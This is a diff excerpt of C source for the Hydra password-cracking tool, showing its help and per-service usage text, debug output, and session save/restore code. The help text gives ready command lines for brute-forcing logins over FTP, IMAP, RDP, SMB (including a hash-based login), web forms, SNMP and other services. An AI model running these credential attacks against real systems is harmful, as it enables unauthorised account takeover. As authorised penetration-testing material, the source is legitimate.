+extern char *cmdlinetarget; +extern char *fe80; + +// required global vars +char *prg; +size_t size_of_data = -1; +hydra_head **hydra_heads = NULL; +hydra_target **hydra_targets = NULL; +hydra_option hydra_options; +hydra_brain hydra_brains; +char *sck = NULL; +int prefer_ipv6 = 0, conwait = 0, loop_cnt = 0, fck = 0, options = 0, killed = 0; +int child_head_no = -1, child_socket; + +// moved for restore feature +int process_restore = 0, dont_unlink; +char *login_ptr = NULL, *pass_ptr = "", *csv_ptr = NULL, *servers_ptr = NULL; +size_t countservers = 1, sizeservers = 0; +char empty_login[2] = "", unsupported[500] = ""; + +// required to save stack memory +char snpbuf[MAXBUF]; +int snpdone, snp_is_redo, snpbuflen, snpi, snpj, snpdont; + +#include "performance.h" + +void help(int ext) { + printf("Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr]" " [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]" +#ifdef HAVE_MATH_H + " [-x MIN:MAX:CHARSET]" +#endif + " [-SuvV46] " + //"[server service [OPT]]|" + "[service://server[:PORT][/OPT]]\n"); + printf("\nOptions:\n"); + if (ext) + printf(" -R restore a previous aborted/crashed session\n"); +#ifdef LIBOPENSSL + if (ext) + printf(" -S perform an SSL connect\n"); +#endif + if (ext) + printf(" -s PORT if the service is on a different default port, define it here\n"); + printf(" -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE\n"); + printf(" -p PASS or -P FILE try password PASS, or load several passwords from FILE\n"); +#ifdef HAVE_MATH_H + if (ext) + printf(" -x MIN:MAX:CHARSET password bruteforce generation, type \"-x -h\" to get help\n"); +#endif + if (ext) + printf(" -e nsr try \"n\" null password, \"s\" login as pass and/or \"r\" reversed login\n"); + if (ext) + printf(" -u loop around users, not passwords (effective! implied with -x)\n"); + printf(" -C FILE colon separated \"login:pass\" format, instead of -L/-P options\n"); + printf(" -M FILE list of servers to be attacked in parallel, one entry per line\n"); + if (ext) + printf(" -o FILE write found login/password pairs to FILE instead of stdout\n"); + if (ext) + printf(" -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)\n"); + printf(" -t TASKS run TASKS number of connects in parallel (per host, default: %d)\n", TASKS); + if (ext) + printf(" -w / -W TIME waittime for responses (%ds) / between connects per thread\n", WAITTIME); + if (ext) + printf(" -4 / -6 prefer IPv4 (default) or IPv6 addresses\n"); + if (ext) + printf(" -v / -V / -d verbose mode / show login+pass for each attempt / debug mode \n"); + printf(" -U service module usage details\n"); + if (ext == 0) + printf(" -h more command line options (COMPLETE HELP)\n"); + printf(" server the target server (use either this OR the -M option)\n"); + printf(" service the service to crack (see below for supported protocols)\n"); + printf(" OPT some service modules support additional input (-U for module help)\n"); + + printf("\nSupported services: %s\n", SERVICES); + printf + ("\n%s is a tool to guess/crack valid login/password pairs. Licensed under AGPL\nv3.0. The newest version is always available at %s\n", + PROGRAM, RESOURCE); + printf("Don't use in military or secret service organizations, or for illegal purposes.\n"); + if (ext && strlen(unsupported) > 0) { + if (unsupported[strlen(unsupported) - 1] == ' ') + unsupported[strlen(unsupported) - 1] = 0; + printf("These services were not compiled in: %s.\n", unsupported); + } + if (ext) { + printf("\nUse HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.\n"); + printf("E.g.: %% export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)\n"); + printf(" %% export HYDRA_PROXY_HTTP=http://proxy:8080\n"); + printf(" %% export HYDRA_PROXY_AUTH=user:pass\n"); + } + + printf("\nExample%s:%s hydra -l user -P passlist.txt ftp://192.168.0.1\n", ext == 0 ? "" : "s", ext == 0 ? "" : "\n"); + if (ext) { + printf(" hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN\n"); + printf(" hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5\n"); + } + exit(-1); +} + +void help_bfg() { + printf("Hydra bruteforce password generation option usage:\n\n" + " -x MIN:MAX:CHARSET\n\n" + " MIN is the minimum number of characters in the password\n" + " MAX is the maximum number of characters in the password\n" + " CHARSET is a specification of the characters to use in the generation\n" + " valid CHARSET values are: 'a' for lowercase letters,\n" + " 'A' for uppercase letters, '1' for numbers, and for all others,\n" + " just add their real representation.\n\n" + "Examples:\n" + " -x 3:5:a generate passwords from length 3 to 5 with all lowercase letters\n" + " -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers\n" + " -x 1:3:/ generate passwords from length 1 to 3 containing only slashes\n" " -x 5:5:/%%,.- generate passwords with length 5 which consists only of /%%,.-\n"); + printf("\nThe bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/\n"); + exit(-1); +} + +void module_usage() { + int find = 0; + + if (hydra_options.service) { + printf("\nHelp for module %s:\n============================================================================\n", hydra_options.service); + if ((strcmp(hydra_options.service, "oracle") == 0) || (strcmp(hydra_options.service, "ora") == 0)) { + printf("Module oracle / ora is optionally taking the ORACLE SID, default is \"ORCL\"\n\n"); + find = 1; + } + if ((strcmp(hydra_options.service, "oracle-listener") == 0) || (strcmp(hydra_options.service, "tns") == 0)) { + printf("Module oracle-listener / tns is optionally taking the mode the password is stored as, could be PLAIN (default) or CLEAR\n\n"); + find = 1; + } + if (strcmp(hydra_options.service, "cvs") == 0) { + printf("Module cvs is optionally taking the repository name to attack, default is \"/root\"\n\n"); + find = 1; + } + if (strcmp(hydra_options.service, "xmpp") == 0) { + printf("Module xmpp is optionally taking one authentication type of:\n" + " LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1\n\n" + "Note, the target passed should be a fdqn as the value is used in the Jabber init request, example: hermes.jabber.org\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "pop3") == 0)) { + printf("Module pop3 is optionally taking one authentication type of:\n" + " CLEAR (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,\n" + " CRAM-SHA256, DIGEST-MD5, NTLM.\n" "Additionally TLS encryption via STLS can be enforced with the TLS option.\n\n" "Example: pop3://target/TLS:PLAIN\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "rdp") == 0)) { + printf("Module rdp is optionally taking the windows domain name.\n" "For example:\nhydra rdp://192.168.0.1/firstdomainname -l john -p doe\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "s7-300") == 0)) { + printf("Module S7-300 is for a special Siemens PLC. It either requires only a password or no authentication, so just use the -p or -P option.\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "nntp") == 0)) { + printf("Module nntp is optionally taking one authentication type of:\n" " USER (default), LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, NTLM\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "imap") == 0)) { + printf("Module imap is optionally taking one authentication type of:\n" + " CLEAR or APOP (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,\n" + " CRAM-SHA256, DIGEST-MD5, NTLM\n" "Additionally TLS encryption via STARTTLS can be enforced with the TLS option.\n\n" "Example: imap://target/TLS:PLAIN\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "smtp-enum")) == 0) { + printf("Module smtp-enum is optionally taking one SMTP command of:\n\n" + "VRFY (default), EXPN, RCPT (which will connect using \"root\" account)\n" + "login parameter is used as username and password parameter as the domain name\n" + "For example to test if john@localhost exists on 192.168.0.1:\n" "hydra smtp-enum://192.168.0.1/vrfy -l john -p localhost\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "smtp")) == 0) { + printf("Module smtp is optionally taking one authentication type of:\n" + " LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, NTLM\n\n" + "Additionally TLS encryption via STARTTLS can be enforced with the TLS option.\n\n" "Example: smtp://target/TLS:PLAIN\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "svn") == 0)) { + printf("Module svn is optionally taking the repository name to attack, default is \"trunk\"\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "ncp") == 0)) { + printf("Module ncp is optionally taking the full context, for example \".O=cx\"\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "firebird") == 0)) { + printf("Module firebird is optionally taking the database path to attack,\n" "default is \"C:\\Program Files\\Firebird\\Firebird_1_5\\security.fdb\"\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "mysql") == 0)) { + printf("Module mysql is optionally taking the database to attack, default is \"mysql\"\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "irc") == 0)) { + printf("Module irc is optionally taking the general server password, if the server is requiring one\n" "and none is passed the password from -p/-P will be used\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "postgres") == 0)) { + printf("Module postgres is optionally taking the database to attack, default is \"template1\"\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "telnet") == 0)) { + printf("Module telnet is optionally taking the string which is displayed after\n" + "a successful login (case insensitive), use if the default in the telnet\n" "module produces too many false positives\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "sapr3") == 0)) { + printf("Module sapr3 requires the client id, a number between 0 and 99\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "sshkey") == 0)) { + printf("Module sshkey does not provide additional options, although the semantic for\n" + "options -p and -P is changed:\n" + " -p expects a path to an unencrypted private key in PEM format.\n" + " -P expects a filename containing a list of path to some unencrypted\n" " private keys in PEM format.\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "cisco-enable") == 0)) { + printf("Module cisco-enable is optionally taking the logon password for the cisco device\n" + "Note: if AAA authentication is used, use the -l option for the username\n" + "and the optional parameter for the password of the user.\n" + "Examples:\n" + " hydra -P pass.txt target cisco-enable (direct console access)\n" + " hydra -P pass.txt -m cisco target cisco-enable (Logon password cisco)\n" + " hydra -l foo -m bar -P pass.txt -m cisco target cisco-enable (AAA Login foo, password bar)\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "cisco") == 0)) { + printf("Module cisco is optionally taking the keyword ENTER, it then sends an initial\n" "ENTER when connecting to the service.\n"); + find = 1; + } + if (!find && ((strcmp(hydra_options.service, "ldap2") == 0) + || (strcmp(hydra_options.service, "ldap3") == 0) + || (strcmp(hydra_options.service, "ldap3-crammd5") == 0) + || (strcmp(hydra_options.service, "ldap3-digestmd5") == 0)) + ) { + printf("Module %s is optionally taking the DN (depending of the auth method choosed\n" + "Note: you can also specify the DN as login when Simple auth method is used).\n" + "The keyword \"^USER^\" is replaced with the login.\n" + "Special notes for Simple method has 3 operation modes: anonymous, (no user no pass),\n" + "unauthenticated (user but no pass), user/pass authenticated (user and pass).\n" + "So don't forget to set empty string as user/pass to test all modes.\n" + "Hint: to authenticate to a windows active directy ldap, this is usually\n" + " cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com\n\n", hydra_options.service); + find = 1; + } + if (!find && ((strcmp(hydra_options.service, "smb") == 0) || (strcmp(hydra_options.service, "smbnt") == 0))) { + printf("Module smb default value is set to test both local and domain account, using a simple password with NTLM dialect.\n" + "Note: you can set the group type using LOCAL or DOMAIN keyword\n" + " or other_domain:{value} to specify a trusted domain.\n" + " you can set the password type using HASH or MACHINE keyword\n" + " (to use the Machine's NetBIOS name as the password).\n" + " you can set the dialect using NTLMV2, NTLM, LMV2, LM keyword.\n" + "Example: \n" + " hydra smb://microsoft.com -l admin -p tooeasy -m \"local lmv2\"\n" + " hydra smb://microsoft.com -l admin -p D5731CFC6C2A069C21FD0D49CAEBC9EA:2126EE7712D37E265FD63F2C84D2B13D::: -m \"local hash\"\n" + " hydra smb://microsoft.com -l admin -p tooeasy -m \"other_domain:SECONDDOMAIN\"\n\n"); + find = 1; + } + if (!find && ((strcmp(hydra_options.service, "http-get-form") == 0) + || (strcmp(hydra_options.service, "https-get-form") == 0) + || (strcmp(hydra_options.service, "http-post-form") == 0) + || (strcmp(hydra_options.service, "https-post-form") == 0) + || (strncmp(hydra_options.service, "http-form", 9) == 0) + || (strncmp(hydra_options.service, "https-form", 10) == 0) + ) + ) { + printf("Module %s requires the page and the parameters for the web form.\n\n" + "By default this module is configured to follow a maximum of 5 redirections in\n" + "a row. It always gathers a new cookie from the same URL without variables\n" + "The parameters take three \":\" separated values, plus optional values.\n" + "(Note: if you need a colon in the option string as value, escape it with \"\\:\", but do not escape a \"\\\" with \"\\\\\".)\n" + "\nSyntax: :
:[:[:]\n" + "First is the page on the server to GET or POST to (URL).\n" + "Second is the POST/GET variables (taken from either the browser, proxy, etc.\n" + " with usernames and passwords being replaced in the \"^USER^\" and \"^PASS^\"\n" + " placeholders (FORM PARAMETERS)\n" + "Third is the string that it checks for an *invalid* login (by default)\n" + " Invalid condition login check can be preceded by \"F=\", successful condition\n" + " login check must be preceded by \"S=\".\n" + " This is where most people get it wrong. You have to check the webapp what a\n" + " failed string looks like and put it in this parameter!\n" + "The following parameters are optional:\n" + " C=/page/uri to define a different page to gather initial cookies from\n" + " H=My-Hdr: foo to send a user defined HTTP header with each request\n" + " ^USER^ and ^PASS^ can also be put into these headers!\n" + "Examples:\n" + " \"/login.php:user=^USER^&pass=^PASS^:incorrect\"\n" + " \"/login.php:user=^USER^&pass=^PASS^&colon=colon\\:escape:S=authlog=.*success\"\n" + " \"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed\"\n" + " \"/:user=^USER&pass=^PASS^:failed:H=Authorization: Basic dT1w:H=X-User: ^USER^\"\n" + " \"/exchweb/bin/auth/owaauth.dll:destination=http%%3A%%2F%%2F%%2Fexchange&flags=0&username=%%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb\"\n", + hydra_options.service); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "http-proxy") == 0)) { + printf("Module http-proxy is optionally taking the page to authenticate at.\n" + "Default is http://www.microsoft.com/)\n" "Basic, DIGEST-MD5 and NTLM are supported and negotiated automatically.\n\n"); + find = 1; + } + if (!find && (strcmp(hydra_options.service, "http-proxy-urlenum") == 0)) { + printf("Module http-proxy-urlenum only uses the -L option, not -x or -p/-P option.\n" + "The -L loginfile must contain the URL list to try through the proxy.\n" + "The proxy credentials cann be put as the optional parameter, e.g.\n" + " hydra -L urllist.txt -s 3128 target.com http-proxy-urlenum user:pass\n" " hydra -L urllist.txt http-proxy-urlenum://target.com:3128/user:pass\n\n"); + find = 1; + } + if (!find && (strncmp(hydra_options.service, "snmp", 4) == 0)) { + printf("Module snmp is optionally taking the following parameters:\n"); + printf(" READ perform read requests (default)\n"); + printf(" WRITE perform write requests\n"); + printf(" 1 use SNMP version 1 (default)\n"); + printf(" 2 use SNMP version 2\n"); + printf(" 3 use SNMP version 3\n"); + printf(" Note that SNMP version 3 usually uses both login and passwords!\n"); + printf(" SNMP version 3 has the following optional sub parameters:\n"); + printf(" MD5 use MD5 authentication (default)\n"); + printf(" SHA use SHA authentication\n"); + printf(" DES use DES encryption\n"); + printf(" AES use AES encryption\n"); + printf(" if no -p/-P parameter is given, SNMPv3 noauth is performed, which\n"); + printf(" only requires a password (or username) not both.\n"); + printf("To combine the options, use colons (\":\"), e.g.:\n"); + printf(" hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ target.com snmp\n"); + printf(" hydra -P pass.txt -m 2 target.com snmp\n"); + find = 1; + } + if (!find && ((strcmp(hydra_options.service, "http-get") == 0) + || (strcmp(hydra_options.service, "https-get") == 0) + || (strcmp(hydra_options.service, "http-post") == 0) + || (strcmp(hydra_options.service, "https-post") == 0)) + ) { + printf("Module %s requires the page to authenticate.\n" + "For example: \"/secret\" or \"http://bla.com/foo/bar\" or \"https://test.com:8080/members\"\n\n", hydra_options.service); + find = 1; + } + } + if (!find) // this is also printed if the module does not exist at all + printf("The Module %s does not need or support optional parameters\n", hydra_options.service); + exit(0); +} + +void hydra_debug(int force, char *string) { + int i; + + if (!debug && !force) + return; + + printf("[DEBUG] Code: %s Time: %lu\n", string, (unsigned long int) time(NULL)); + printf("[DEBUG] Options: mode %d ssl %d restore %d showAttempt %d tasks %d max_use %d tnp %d tpsal %d tprl %d exit_found %d miscptr %s service %s\n", + hydra_options.mode, hydra_options.ssl, hydra_options.restore, hydra_options.showAttempt, hydra_options.tasks, hydra_options.max_use, + hydra_options.try_null_password, hydra_options.try_password_same_as_login, hydra_options.try_password_reverse_login, hydra_options.exit_found, + hydra_options.miscptr == NULL ? "(null)" : hydra_options.miscptr, hydra_options.service); + printf("[DEBUG] Brains: active %d targets %d finished %d todo_all %lu todo %lu sent %lu found %lu countlogin %lu sizelogin %lu countpass %lu sizepass %lu\n", + hydra_brains.active, hydra_brains.targets, hydra_brains.finished, hydra_brains.todo_all, hydra_brains.todo, hydra_brains.sent, hydra_brains.found, + (unsigned long int) hydra_brains.countlogin, (unsigned long int) hydra_brains.sizelogin, (unsigned long int) hydra_brains.countpass, + (unsigned long int) hydra_brains.sizepass); + for (i = 0; i < hydra_brains.targets; i++) + printf + ("[DEBUG] Target %d - target %s ip %s login_no %lu pass_no %lu sent %lu pass_state %d use_count %d failed %d done %d fail_count %d login_ptr %s pass_ptr %s\n", + i, hydra_targets[i]->target == NULL ? "(null)" : hydra_targets[i]->target, hydra_address2string(hydra_targets[i]->ip), hydra_targets[i]->login_no, + hydra_targets[i]->pass_no, hydra_targets[i]->sent, hydra_targets[i]->pass_state, hydra_targets[i]->use_count, hydra_targets[i]->failed, hydra_targets[i]->done, + hydra_targets[i]->fail_count, hydra_targets[i]->login_ptr == NULL ? "(null)" : hydra_targets[i]->login_ptr, + hydra_targets[i]->pass_ptr == NULL ? "(null)" : hydra_targets[i]->pass_ptr); + if (hydra_heads != NULL) + for (i = 0; i < hydra_options.max_use; i++) + printf("[DEBUG] Task %d - pid %d active %d redo %d current_login_ptr %s current_pass_ptr %s\n", + i, (int) hydra_heads[i]->pid, hydra_heads[i]->active, hydra_heads[i]->redo, + hydra_heads[i]->current_login_ptr == NULL ? "(null)" : hydra_heads[i]->current_login_ptr, + hydra_heads[i]->current_pass_ptr == NULL ? "(null)" : hydra_heads[i]->current_pass_ptr); +} + +void bail(char *text) { + fprintf(stderr, "[ERROR] %s\n", text); + exit(-1); +} + +/* +void hydra_bfg_remove(int head_no) { + int i = 0, j = 0; + char *ptr; + + if (hydra_heads[head_no]->current_pass_ptr == NULL || + hydra_heads[head_no]->current_pass_ptr == hydra_targets[hydra_heads[head_no]->target_no]->pass_ptr || + hydra_heads[head_no]->current_pass_ptr[0] == 0) + return; + if (hydra_brains.countlogin > 1) { + for (i = 0; i < hydra_options.max_use && j < 2; i++) + if (hydra_targets[hydra_heads[head_no]->target_no]->bfg_ptr[i] == hydra_heads[head_no]->current_pass_ptr) + j++; + if (j != 1) + return; + } + if (debug) + printf("[DEBUG] bfg free of child %d ptr %p (%s)\n", head_no, hydra_heads[head_no]->current_pass_ptr, hydra_heads[head_no]->current_pass_ptr); + // to prevent a race condition + ptr = hydra_heads[head_no]->current_pass_ptr; + hydra_targets[hydra_heads[head_no]->target_no]->bfg_ptr[i] = NULL; + hydra_heads[head_no]->current_pass_ptr = NULL; + free(ptr); +} +*/ + +void hydra_restore_write(int print_msg) { + FILE *f; + hydra_brain brain; + char mynull[4] = { 0, 0, 0, 0 }; + int i = 0, j = 0; + hydra_head hh; + + if (process_restore != 1) + return; + + for (i = 0; i < hydra_brains.targets; i++) + if (hydra_targets[j]->done != 1 && hydra_targets[j]->done != 3) + j++; + if (j == 0) { + process_restore = 0; + return; + } + + if ((f = fopen(RESTOREFILE, "w")) == NULL) { + fprintf(stderr, "[ERROR] Can not create restore file (%s) - \n", RESTOREFILE); + perror(""); + process_restore = 0; + return; + } else if (debug) + printf("[DEBUG] Writing restore file... "); + + fprintf(f, "%s\n", PROGRAM); + memcpy(&brain, &hydra_brains, sizeof(hydra_brain)); + brain.targets = i; + brain.ofp = NULL; + brain.finished = brain.active = 0; + fck = fwrite(&bf_options, sizeof(bf_options), 1, f); + if (bf_options.crs != NULL) + fck = fwrite(bf_options.crs, BF_CHARSMAX, 1, f); + else + fck = fwrite(mynull, sizeof(mynull), 1, f); + fck = fwrite(&brain, sizeof(hydra_brain), 1, f); + fck = fwrite(&hydra_options, sizeof(hydra_option), 1, f); + fprintf(f, "%s\n", hydra_options.server == NULL ? "" : hydra_options.server); + if (hydra_options.outfile_ptr == NULL) + fprintf(f, "\n"); + else + fprintf(f, "%s\n", hydra_options.outfile_ptr); + fprintf(f, "%s\n%s\n", hydra_options.miscptr == NULL ? "" : hydra_options.miscptr, hydra_options.service); + fck = fwrite(login_ptr, hydra_brains.sizelogin, 1, f); + if (hydra_options.colonfile == NULL || hydra_options.colonfile == empty_login) + fck = fwrite(pass_ptr, hydra_brains.sizepass, 1, f); + for (j = 0; j < hydra_brains.targets; j++) + if (hydra_targets[j]->done != 1) { + fck = fwrite(hydra_targets[j], sizeof(hydra_target), 1, f); + fprintf(f, "%s\n%d\n%d\n", hydra_targets[j]->target == NULL ? "" : hydra_targets[j]->target, (int) (hydra_targets[j]->login_ptr - login_ptr), + (int) (hydra_targets[j]->pass_ptr - pass_ptr)); + fprintf(f, "%s\n%s\n", hydra_targets[j]->login_ptr, hydra_targets[j]->pass_ptr); + if (hydra_targets[j]->redo) + for (i = 0; i < hydra_targets[j]->redo; i++) + fprintf(f, "%s\n%s\n", hydra_targets[j]->redo_login[i], hydra_targets[j]->redo_pass[i]); + if (hydra_targets[j]->skipcnt) + for (i = 0; i < hydra_targets[j]->skipcnt; i++) + fprintf(f, "%s\n", hydra_targets[j]->skiplogin[i]); + } + for (j = 0; j < hydra_options.max_use; j++) { + memcpy((char *) &hh, hydra_heads[j], sizeof(hydra_head)); + hh.active = 0; // re-enable disabled heads + if ((hh.current_login_ptr != NULL && hh.current_login_ptr != empty_login) + || (hh.current_pass_ptr != NULL && hh.current_pass_ptr != empty_login)) { + hh.redo = 1; + if (print_msg && debug) + printf("[DEBUG] we will redo the following combination: target %s login \"%s\" pass \"%s\"\n", hydra_targets[hh.target_no]->target, + hh.current_login_ptr, hh.current_pass_ptr); + } + fck = fwrite((char *) &hh, sizeof(hydra_head), 1, f); + if (hh.redo /* && (hydra_options.bfg == 0 || (hh.current_pass_ptr == hydra_targets[hh.target_no]->bfg_ptr[j] && isprint((char) hh.current_pass_ptr[0]))) */ ) + fprintf(f, "%s\n%s\n", hh.current_login_ptr == NULL ? "" : hh.current_login_ptr, hh.current_pass_ptr == NULL ? "" : hh.current_pass_ptr); + else + fprintf(f, "\n\n"); + } + + fprintf(f, "%s\n", PROGRAM); + fclose(f); + if (debug) + printf("done\n"); + if (print_msg) + printf("The session file ./hydra.restore was written. Type \"hydra -R\" to resume session.\n"); + hydra_debug(0, "hydra_restore_write()"); +} + +void hydra_restore_read() { + FILE *f; + char mynull[4]; + int i, j; + char out[1024]; + + if ((f = fopen(RESTOREFILE, "r")) == NULL) { + fprintf(stderr, "[ERROR] restore file (%s) not found - ", RESTOREFILE); + perror(""); + exit(-1); + } + + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + if (strcmp(out, PROGRAM) != 0) { + fprintf(stderr, "[ERROR] invalid restore file (begin)\n"); + exit(-1); + } + fck = (int) fread(&bf_options, sizeof(bf_options), 1, f); + fck = (int) fread(mynull, sizeof(mynull), 1, f); + if (mynull[0] + mynull[1] + mynull[2] + mynull[3] == 0) { + bf_options.crs = NULL; + } else { + bf_options.crs = malloc(BF_CHARSMAX); + memcpy(bf_options.crs, mynull, sizeof(mynull)); + fck = fread(bf_options.crs + sizeof(mynull), BF_CHARSMAX - sizeof(mynull), 1, f); + } + + fck = (int) fread(&hydra_brains, sizeof(hydra_brain), 1, f); + hydra_brains.ofp = stdout; + fck = (int) fread(&hydra_options, sizeof(hydra_option), 1, f); + hydra_options.restore = 1; + verbose = hydra_options.verbose; + debug = hydra_options.debug; + waittime = hydra_options.waittime; + conwait = hydra_options.conwait; + port = hydra_options.port; + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_options.server = strdup(out); + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + if (strlen(out) > 0) { + hydra_options.outfile_ptr = malloc(strlen(out) + 1); + strcpy(hydra_options.outfile_ptr, out); + } else + hydra_options.outfile_ptr = NULL; + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + if (strlen(out) == 0) + hydra_options.miscptr = NULL; + else { + hydra_options.miscptr = malloc(strlen(out) + 1); + strcpy(hydra_options.miscptr, out); + } + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_options.service = malloc(strlen(out) + 1); + strcpy(hydra_options.service, out); + + login_ptr = malloc(hydra_brains.sizelogin); + fck = (int) fread(login_ptr, hydra_brains.sizelogin, 1, f); + if ((hydra_options.mode & 64) != 64) { // NOT colonfile mode + pass_ptr = malloc(hydra_brains.sizepass); + fck = (int) fread(pass_ptr, hydra_brains.sizepass, 1, f); + } else { // colonfile mode + hydra_options.colonfile = empty_login; // dummy + pass_ptr = csv_ptr = login_ptr; + } + + hydra_targets = malloc(hydra_brains.targets * sizeof(hydra_targets)); + for (j = 0; j < hydra_brains.targets; j++) { + hydra_targets[j] = malloc(sizeof(hydra_target)); + fck = (int) fread(hydra_targets[j], sizeof(hydra_target), 1, f); + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_targets[j]->target = malloc(strlen(out) + 1); + strcpy(hydra_targets[j]->target, out); + sck = fgets(out, sizeof(out), f); + hydra_targets[j]->login_ptr = login_ptr + atoi(out); + sck = fgets(out, sizeof(out), f); + hydra_targets[j]->pass_ptr = pass_ptr + atoi(out); + sck = fgets(out, sizeof(out), f); // target login_ptr, ignord + sck = fgets(out, sizeof(out), f); + if (hydra_options.bfg) { + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_targets[j]->pass_ptr = malloc(strlen(out) + 1); + strcpy(hydra_targets[j]->pass_ptr, out); + } + if (hydra_targets[j]->redo > 0) + for (i = 0; i < hydra_targets[j]->redo; i++) { + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_targets[j]->redo_login[i] = malloc(strlen(out) + 1); + strcpy(hydra_targets[j]->redo_login[i], out); + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_targets[j]->redo_pass[i] = malloc(strlen(out) + 1); + strcpy(hydra_targets[j]->redo_pass[i], out); + } + if (hydra_targets[j]->skipcnt > 0) + for (i = 0; i < hydra_targets[j]->skipcnt; i++) { + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_targets[j]->skiplogin[i] = malloc(strlen(out) + 1); + strcpy(hydra_targets[j]->skiplogin[i], out); + } + hydra_targets[j]->fail_count = 0; + hydra_targets[j]->use_count = 0; + hydra_targets[j]->failed = 0; + } + hydra_heads = malloc(hydra_options.max_use * sizeof(hydra_heads)); + for (j = 0; j < hydra_options.max_use; j++) { + hydra_heads[j] = malloc(sizeof(hydra_head)); + fck = (int) fread(hydra_heads[j], sizeof(hydra_head), 1, f); + hydra_heads[j]->sp[0] = -1; + hydra_heads[j]->sp[1] = -1; + sck = fgets(out, sizeof(out), f); + if (hydra_heads[j]->redo) { + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + hydra_heads[j]->current_login_ptr = malloc(strlen(out) + 1); + strcpy(hydra_heads[j]->current_login_ptr, out); + } + sck = fgets(out, sizeof(out), f); + if (hydra_heads[j]->redo) { + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + if (out[0] != 0 || hydra_heads[j]->current_login_ptr[0] != 0) { + hydra_heads[j]->current_pass_ptr = malloc(strlen(out) + 1); + strcpy(hydra_heads[j]->current_pass_ptr, out); + if (debug) + printf("[DEBUG] redo: %d %s/%s\n", j, hydra_heads[j]->current_login_ptr, hydra_heads[j]->current_pass_ptr); + } else { + hydra_heads[j]->redo = 0; + free(hydra_heads[j]->current_login_ptr); + hydra_heads[j]->current_login_ptr = hydra_heads[j]->current_pass_ptr = empty_login; + } + } else { + hydra_heads[j]->current_login_ptr = hydra_heads[j]->current_pass_ptr = empty_login; + } + } + sck = fgets(out, sizeof(out), f); + if (out[0] != 0 && out[strlen(out) - 1] == '\n') + out[strlen(out) - 1] = 0; + if (strcmp(out, PROGRAM) != 0) { + fprintf(stderr, "[ERROR] invalid restore file (end)\n"); + exit(-1); + } + fclose(f); + hydra_debug(0, "hydra_restore_read"); +} + +void killed_childs(int signo) { + int pid, i; + + killed++; + pid = wait3(NULL, WNOHANG, NULL); + for (i = 0; i < hydra_options.max_use; i++) { + if (pid == hydra_heads[i]->pid) { + hydra_heads[i]->pid = -1; + hydra_kill_head(i, 1, 0); + return; + } + } +} + +void killed_childs_report(int signo) { + if (debug) + printf("[DEBUG] children crashed! (%d)\n", child_head_no); + fck = write(child_socket, "E", 1); + _exit(-1); +} + +void kill_children(int signo) { + int i; + + if (verbose) + fprintf(stderr, "[ERROR] Received signal %d, going down ...\n", signo); + if (process_restore == 1) + hydra_restore_write(1); 